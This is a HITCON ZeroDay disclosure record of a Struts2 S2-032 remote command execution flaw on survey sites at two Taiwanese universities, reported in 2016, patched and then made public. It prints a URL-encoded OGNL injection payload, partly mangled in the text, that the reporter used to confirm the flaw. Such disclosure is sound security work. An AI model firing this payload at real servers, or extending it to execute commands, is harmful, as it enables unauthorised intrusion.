Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2016-00071
- Vendor: 高雄醫學大學, 逢甲大學
- Title: 高醫, 逢甲 Struct2 S2-032 弱點
- Introduction: S2-032遠端執行任意指令
處理狀態
目前狀態
公開
Last Update : 2016/11/09
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2016/05/12 18:21:49 : 新提交 (由 jason3e7 更新此狀態)
- 2016/05/21 01:23:14 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/09/20 13:15:44 : 確認已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/11/09 03:00:03 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)
詳細資料
- ZDID:ZD-2016-00071
- 通報者:jason3e7 (jason3e7)
- 風險:嚴重
- 類型:遠端執行任意指令 (Arbitrary Command Execution)
參考資料
暫無資料
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://survey.fcu.edu.tw/QS00/respondentIndex.action
https://survey.kmu.edu.tw/QS00/respondentIndex.action
https://survey.kmu.edu.tw/QS00/respondentIndex.action
敘述
-
使用簡單檢測語法
?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%2C%23test%3D%23context.get%28%23parameters.res%5B0%5D%29.getWriter%28%29%2C%23test.println%28%23parameters.command%5B0%5D%29%2C%23test.flush%28%29%2C%23test.close&res=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=%23%23%23Struts2 S2-032 Vulnerable%23%23%23 -
出現 ###Struts2 S2-032 Vulnerable###
擷圖
留言討論
登入後留言